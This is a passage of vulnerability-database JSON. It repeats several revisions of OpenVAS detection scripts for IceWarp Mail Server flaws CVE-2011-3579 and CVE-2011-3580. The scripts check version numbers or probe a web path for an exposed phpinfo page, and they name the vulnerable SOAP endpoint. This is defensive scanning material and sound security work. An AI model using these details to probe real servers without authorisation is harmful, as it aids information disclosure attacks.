"differentElements": ["description", "modified", "sourceData"], "edition": 4, "lastseen": "2018-09-02T00:02:46"}], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-3579", "CVE-2011-3580"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103279", "OPENVAS:103279"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11920", "SECURITYVULNS:DOC:27071"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:105320"]}, {"type": "exploitdb", "idList": ["EDB-ID:36165"]}], "modified": "2019-05-29T18:39:28", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2019-05-29T18:39:28", "rev": 2}}, "objectVersion": "1.4", "pluginID": "1361412562310902478", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:icewarp:mail_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902478\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-27 17:29:53 +0200 (Tue, 27 Sep 2011)\");\n script_cve_id(\"CVE-2011-3579\", \"CVE-2011-3580\");\n script_bugtraq_id(49753);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/46135/\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/70026\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/70025\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_icewarp_web_detect.nasl\");\n script_mandatory_keys(\"icewarp/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to gain access to potentially\nsensitive information, and possibly cause denial-of-service conditions. Other attacks may also be possible.\");\n\n script_tag(name:\"affected\", value:\"IceWarp Mail Server 10.3.2 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to IceWarp Mail Server 10.3.3 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is running IceWarp Mail Server and is prone to xml entity injection\nand information disclosure vulnerability.\n\nThe flaws are due to:\n\n - Certain input passed via SOAP messages to 'server/webmail.php' is not properly verified before being used. This\ncan be exploited to disclose the contents of arbitrary files.\n\n - An unspecified script, which calls the 'phpinfo()' function, is stored with insecure permissions inside the web\nroot. This can be exploited to gain knowledge of sensitive information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.icewarp.com\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif (!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\nif (!icewarp = get_app_version(cpe:CPE, port:port))\n exit(0);\n\nif (version_is_less(version: icewarp, test_version: \"10.3.3\")) {\n report = report_fixed_ver(installed_version: icewarp, fixed_version: \"10.3.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web application abuses", "_object_type": "robots.models.openvas.OpenVASBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openvas.OpenVASBulletin"]}, {"id": "OPENVAS:1361412562310103279", "hash": "b08309323897c5a5404b9dee23d4dc29", "type": "openvas", "bulletinFamily": "scanner", "title": "IceWarp Web Mail Multiple Information Disclosure Vulnerabilities", "description": "IceWarp Web Mail is prone to multiple information-disclosure\n vulnerabilities.", "published": "2011-09-28T00:00:00", "modified": "2020-05-06T00:00:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103279", "reporter": "Copyright (C) 2011 Greenbone Networks GmbH", "references": ["http://www.securityfocus.com/bid/49753", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt"], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "lastseen": "2020-05-08T19:10:45", "history": [{"bulletin": {"id": "OPENVAS:1361412562310103279", "hash": "ad781e870770a871d01ac15ff7a2896ccc4873fc5f46f77a371df4ba65ed1396", "type": "openvas", "bulletinFamily": "scanner", "title": "IceWarp Web Mail Multiple Information Disclosure Vulnerabilities", "description": "IceWarp Web Mail is prone to multiple information-disclosure\n vulnerabilities.", "published": "2011-09-28T00:00:00", "modified": "2020-05-07T00:00:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103279", "reporter": "Copyright (C) 2011 Greenbone Networks GmbH", "references": ["http://www.securityfocus.com/bid/49753", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt"], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "lastseen": "2020-05-08T11:07:00", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"modified": "2020-05-08T11:07:00", "references": [{"idList": ["OPENVAS:103279", "OPENVAS:1361412562310902478"], "type": "openvas"}, {"idList": ["EDB-ID:36165"], "type": "exploitdb"}, {"idList": ["CVE-2011-3580", "CVE-2011-3579"], "type": "cve"}, {"idList": ["SECURITYVULNS:DOC:27071", "SECURITYVULNS:VULN:11920"], "type": "securityvulns"}, {"idList": ["PACKETSTORM:105320"], "type": "packetstorm"}], "rev": 2}, "score": {"modified": "2020-05-08T11:07:00", "rev": 2, "value": 5.9, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310103279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103279\");\n script_version(\"2020-05-06T13:14:18+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-07 10:48:07 +0000 (Thu, 07 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-09-28 12:51:43 +0200 (Wed, 28 Sep 2011)\");\n script_bugtraq_id(49753);\n script_cve_id(\"CVE-2011-3579\", \"CVE-2011-3580\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IceWarp/banner\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/49753\");\n script_xref(name:\"URL\", value:\"https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt\");\n\n script_tag(name:\"summary\", value:\"IceWarp Web Mail is prone to multiple information-disclosure\n vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these issues to gain access to potentially\n sensitive information, and possibly cause denial-of-service conditions. Other attacks may also be possible.\");\n\n script_tag(name:\"solution\", value:\"Vendor updates are available. Please see the references for more\n information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\nif( ! http_can_host_php( port:port ) ) exit( 0 );\n\nbanner = http_get_remote_headers( port:port );\nif( ! banner || \"IceWarp\" >!< banner ) exit( 0 );\n\nforeach dir( make_list_unique( \"/webmail\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = dir + \"/server/\";\n\n if( http_vuln_check( port:port, url:url, pattern:\"<title>phpinfo\$\$\", usecache:TRUE ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "naslFamily": "Web application abuses"}, "differentElements": ["modified", "sourceData"], "edition": 7, "lastseen": "2020-05-08T11:07:00"}, {"bulletin": {"id": "OPENVAS:1361412562310103279", "hash": "062bf1a936027942124c80d932d730badcc59e5323edc9da9d54ecd4666aae38", "type": "openvas", "bulletinFamily": "scanner", "title": "IceWarp Web Mail Multiple Information Disclosure Vulnerabilities", "description": "IceWarp Web Mail is prone to multiple information-disclosure\n vulnerabilities.", "published": "2011-09-28T00:00:00", "modified": "2018-05-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103279", "reporter": "This script is Copyright (C) 2011 Greenbone Networks GmbH", "references": ["http://www.securityfocus.com/bid/49753", "http://www.icewarp.com/Products/IceWarp_Web_Mail/", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt"], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "lastseen": "2018-08-30T19:27:12", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310103279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_IceWarp_49753.nasl 9727 2018-05-04 09:12:47Z cfischer $\n#\n# IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103279\");\n script_version(\"$Revision: 9727 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-05-04 11:12:47 +0200 (Fri, 04 May 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-28 12:51:43 +0200 (Wed, 28 Sep 2011)\");\n script_bugtraq_id(49753);\n script_cve_id(\"CVE-2011-3579\",\"CVE-2011-3580\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IceWarp/banner\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/49753\");\n script_xref(name:\"URL\", value:\"http://www.icewarp.com/Products/IceWarp_Web_Mail/\");\n script_xref(name:\"URL\", value:\"https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt\");\n\n script_tag(name:\"summary\", value:\"IceWarp Web Mail is prone to multiple information-disclosure\n vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these issues to gain access to potentially\n sensitive information, and possibly cause denial-of-service conditions. Other attacks may also be possible.\");\n\n script_tag(name:\"solution\", value:\"Vendor updates are available. Please see the references for more\n information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port( default:80 );\nif( ! can_host_php( port:port ) ) exit( 0 );\n\nbanner = get_http_banner( port:port );\nif( ! banner || \"IceWarp\" >!< banner ) exit( 0 );\n\nforeach dir( make_list_unique( \"/webmail\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = dir + \"/server/\";\n\n if( http_vuln_check( port:port, url:url, pattern:\"<title>phpinfo\$\$\", usecache:TRUE ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );", "naslFamily": "Web application abuses"}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:27:12"}, {"bulletin": {"id": "OPENVAS:1361412562310103279", "hash": "f32ef54fc6097239088f4b519dee8b2424626e028816071b5cffc1d920b69932", "type": "openvas", "bulletinFamily": "scanner", "title": "IceWarp Web Mail Multiple Information Disclosure Vulnerabilities", "description": "IceWarp Web Mail is prone to multiple information-disclosure\n vulnerabilities.", "published": "2011-09-28T00:00:00", "modified": "2018-05-04T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103279", "reporter": "This script is Copyright (C) 2011 Greenbone Networks GmbH", "references": ["http://www.securityfocus.com/bid/49753", "http://www.icewarp.com/Products/IceWarp_Web_Mail/", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt"], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "lastseen": "2018-09-02T00:02:49", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310103279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_IceWarp_49753.nasl 9727 2018-05-04 09:12:47Z cfischer $\n#\n# IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103279\");\n script_version(\"$Revision: 9727 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-05-04 11:12:47 +0200 (Fri, 04 May 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-28 12:51:43 +0200 (Wed, 28 Sep 2011)\");\n script_bugtraq_id(49753);\n script_cve_id(\"CVE-2011-3579\",\"CVE-2011-3580\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IceWarp/banner\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/49753\");\n script_xref(name:\"URL\", value:\"http://www.icewarp.com/Products/IceWarp_Web_Mail/\");\n script_xref(name:\"URL\", value:\"https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt\");\n\n script_tag(name:\"summary\", value:\"IceWarp Web Mail is prone to multiple information-disclosure\n vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these issues to gain access to potentially\n sensitive information, and possibly cause denial-of-service conditions. Other attacks may also be possible.\");\n\n script_tag(name:\"solution\", value:\"Vendor updates are available. Please see the references for more\n information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port( default:80 );\nif( ! can_host_php( port:port ) ) exit( 0 );\n\nbanner = get_http_banner( port:port );\nif( ! banner || \"IceWarp\" >!< banner ) exit( 0 );\n\nforeach dir( make_list_unique( \"/webmail\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = dir + \"/server/\";\n\n if( http_vuln_check( port:port, url:url, pattern:\"<title>phpinfo\$\$\", usecache:TRUE ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );", "naslFamily": "Web application abuses"}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2018-09-02T00:02:49"}, {"bulletin": {"id": "OPENVAS:1361412562310103279", "hash": "c94eaef9bf251827027c0277d75de821411fa65da09442c5298fa618de7474fa", "type": "openvas", "bulletinFamily": "scanner", "title": "IceWarp Web Mail Multiple Information Disclosure Vulnerabilities", "description": "IceWarp Web Mail is prone to multiple information-disclosure\n vulnerabilities.", "published": "2011-09-28T00:00:00", "modified": "2018-10-20T00:00:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103279", "reporter": "This script is Copyright (C) 2011 Greenbone Networks GmbH", "references": ["http://www.securityfocus.com/bid/49753", "http://www.icewarp.com/Products/IceWarp_Web_Mail/", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt"], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "lastseen": "2019-05-29T18:39:29", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"modified": "2019-05-29T18:39:29", "references": [{"idList": ["OPENVAS:103279", "OPENVAS:1361412562310902478"], "type": "openvas"}, {"idList": ["EDB-ID:36165"], "type": "exploitdb"}, {"idList": ["CVE-2011-3580", "CVE-2011-3579"], "type": "cve"}, {"idList": ["SECURITYVULNS:DOC:27071", "SECURITYVULNS:VULN:11920"], "type": "securityvulns"}, {"idList": ["PACKETSTORM:105320"], "type": "packetstorm"}], "rev": 2}, "score": {"modified": "2019-05-29T18:39:29", "rev": 2, "value": 5.7, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310103279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_IceWarp_49753.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103279\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-28 12:51:43 +0200 (Wed, 28 Sep 2011)\");\n script_bugtraq_id(49753);\n script_cve_id(\"CVE-2011-3579\", \"CVE-2011-3580\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IceWarp/banner\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/49753\");\n script_xref(name:\"URL\", value:\"http://www.icewarp.com/Products/IceWarp_Web_Mail/\");\n script_xref(name:\"URL\", value:\"https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt\");\n\n script_tag(name:\"summary\", value:\"IceWarp Web Mail is prone to multiple information-disclosure\n vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these issues to gain access to potentially\n sensitive information, and possibly cause denial-of-service conditions. Other attacks may also be possible.\");\n\n script_tag(name:\"solution\", value:\"Vendor updates are available. Please see the references for more\n information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port( default:80 );\nif( ! can_host_php( port:port ) ) exit( 0 );\n\nbanner = get_http_banner( port:port );\nif( ! banner || \"IceWarp\" >!< banner ) exit( 0 );\n\nforeach dir( make_list_unique( \"/webmail\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = dir + \"/server/\";\n\n if( http_vuln_check( port:port, url:url, pattern:\"<title>phpinfo\$\$\", usecache:TRUE ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );", "naslFamily": "Web application abuses"}, "differentElements": ["references", "reporter", "modified", "sourceData"], "edition": 6, "lastseen": "2019-05-29T18:39:29"}, {"bulletin": {"id": "OPENVAS:1361412562310103279", "hash": "f32ef54fc6097239088f4b519dee8b2424626e028816071b5cffc1d920b69932", "type": "openvas", "bulletinFamily": "scanner", "title": "IceWarp Web Mail Multiple Information Disclosure Vulnerabilities", "description": "IceWarp Web Mail is prone to multiple information-disclosure\n vulnerabilities.", "published": "2011-09-28T00:00:00", "modified": "2018-05-04T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103279", "reporter": "This script is Copyright (C) 2011 Greenbone Networks GmbH", "references": ["http://www.securityfocus.com/bid/49753", "http://www.icewarp.com/Products/IceWarp_Web_Mail/", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt"], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "lastseen": "2018-05-07T12:20:36", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310103279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_IceWarp_49753.nasl 9727 2018-05-04 09:12:47Z cfischer $\n#\n# IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103279\");\n script_version(\"$Revision: 9727 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-05-04 11:12:47 +0200 (Fri, 04 May 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-28 12:51:43 +0200 (Wed, 28 Sep 2011)\");\n script_bugtraq_id(49753);\n script_cve_id(\"CVE-2011-3579\",\"CVE-2011-3580\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IceWarp/banner\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/49753\");\n script_xref(name:\"URL\", value:\"http://www.icewarp.com/Products/IceWarp_Web_Mail/\");\n script_xref(name:\"URL\", value:\"https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt\");\n\n script_tag(name:\"summary\", value:\"IceWarp Web Mail is prone to multiple information-disclosure\n vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these issues to gain access to potentially\n sensitive information, and possibly cause denial-of-service conditions. Other attacks may also be possible.\");\n\n script_tag(name:\"solution\", value:\"Vendor updates are available. Please see the references for more\n information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port( default:80 );\nif( ! can_host_php( port:port ) ) exit( 0 );\n\nbanner = get_http_banner( port:port );\nif( ! banner || \"IceWarp\" >!< banner ) exit( 0 );\n\nforeach dir( make_list_unique( \"/webmail\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = dir + \"/server/\";\n\n if( http_vuln_check( port:port, url:url, pattern:\"<title>phpinfo\$\$\", usecache:TRUE ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );", "naslFamily": "Web application abuses"}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-05-07T12:20:36"}], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-3579", "CVE-2011-3580"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310902478", "OPENVAS:103279"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:105320"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11920", "SECURITYVULNS:DOC:27071"]}, {"type": "exploitdb", "idList": ["EDB-ID:36165"]}], "modified": "2020-05-08T19:10:45", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2020-05-08T19:10:45", "rev": 2}}, "objectVersion": "1.4", "pluginID": "1361412562310103279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even 